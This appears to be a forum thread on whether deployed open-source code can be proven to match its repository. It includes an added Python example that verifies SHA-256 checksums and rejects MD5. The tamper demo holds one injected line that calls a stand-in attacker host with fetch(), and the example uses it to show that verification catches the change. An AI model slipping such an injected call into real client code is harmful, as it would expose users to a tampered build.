
> what guarantee do we have that the source code matches the deployed code?

What is the answer to this question in general? Genuinely asking, I never considered this but it seems like a real concern for any OSS.



For an app that exists solely on the client it’s easy to provide an md5 hash that can be verified.

This was and still is a popular solution if you torrent to make sure you’re getting what the original seeder intended. The same philosophy applies here.

For back end apps it’s inherently not possible.


Please do not use md5 in 2021. At least use something like sha256.


Agreed, it was broken a while ago.
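The client-side check described in the comment above (publish a digest, let the downloader verify it), as an added example that is not code from the original thread or from any project discussed in it. It uses SHA-256 rather than MD5, as the replies recommend, and refuses MD5 outright. The file names, file contents and the SHA256SUMS-style listing are all constructed here for illustration.

```python
import hashlib
import hmac

# Algorithms a verifier should accept. MD5 (and SHA-1) are deliberately absent:
# collisions are practical, so a matching digest proves nothing about integrity.
ALLOWED_ALGORITHMS = {"sha256", "sha512"}


def algorithm_accepted(algorithm: str) -> bool:
    """True if the verifier is willing to use this hash algorithm."""
    return algorithm in ALLOWED_ALGORITHMS


def digest_hex(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest of data using an allowed algorithm only."""
    if not algorithm_accepted(algorithm):
        raise ValueError(f"refusing weak or unknown hash algorithm: {algorithm}")
    return hashlib.new(algorithm, data).hexdigest()


def publish_sums(files: dict[str, bytes], algorithm: str = "sha256") -> str:
    """Publisher side: produce a SHA256SUMS-style listing ('<hex>  <name>' per line)."""
    return "".join(f"{digest_hex(data, algorithm)}  {name}\n" for name, data in files.items())


def parse_sums(text: str) -> dict[str, str]:
    """Parse a sums listing into {filename: expected_hex}. Two spaces separate the fields."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        hexdigest, _, name = line.partition("  ")
        if not name:
            raise ValueError(f"malformed sums line: {line!r}")
        expected[name] = hexdigest.lower()
    return expected


def verify(files: dict[str, bytes], sums_text: str, algorithm: str = "sha256") -> dict[str, bool]:
    """Client side: check each downloaded file against the published listing."""
    expected = parse_sums(sums_text)
    results = {}
    for name, data in files.items():
        if name not in expected:
            results[name] = False  # nothing published for this file, so it cannot be trusted
            continue
        actual = digest_hex(data, algorithm)
        # Constant-time comparison; not strictly needed for a public digest, but a good habit.
        results[name] = hmac.compare_digest(actual, expected[name])
    return results


# Constructed sample "release": a client-side bundle plus the listing the publisher ships with it.
RELEASE = {
    "app-1.0.0.js": b"console.log('genuine build');\n",
    "app-1.0.0.js.map": b'{"version":3,"sources":[]}\n',
}
PUBLISHED_SUMS = publish_sums(RELEASE)


def demo() -> tuple[dict, dict]:
    """Verify the genuine release, then a copy whose main bundle was tampered with in transit."""
    genuine = verify(RELEASE, PUBLISHED_SUMS)
    tampered_release = dict(RELEASE)
    tampered_release["app-1.0.0.js"] = (
        b"console.log('genuine build');fetch('https://attacker.example/x');\n"
    )
    tampered = verify(tampered_release, PUBLISHED_SUMS)
    return genuine, tampered


if __name__ == "__main__":
    genuine, tampered = demo()
    print("genuine release:", genuine)
    print("tampered release:", tampered)
```

Note what this does and does not prove: a matching digest shows the download is byte-for-byte what the publisher listed, which is exactly the torrent use case above. It says nothing about whether the publisher's build was produced from the linked repository; that is the question the thread is asking, and a checksum alone does not answer it.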


Yeah, I wondered this myself, and my colleagues at the day job and I were kind of stumped. How does any OSS prove that the repo linked is what is actually deployed?


I don't know that there is an answer, but I'd think the FAQ should at least mention the concern.


Fair - I will add this.




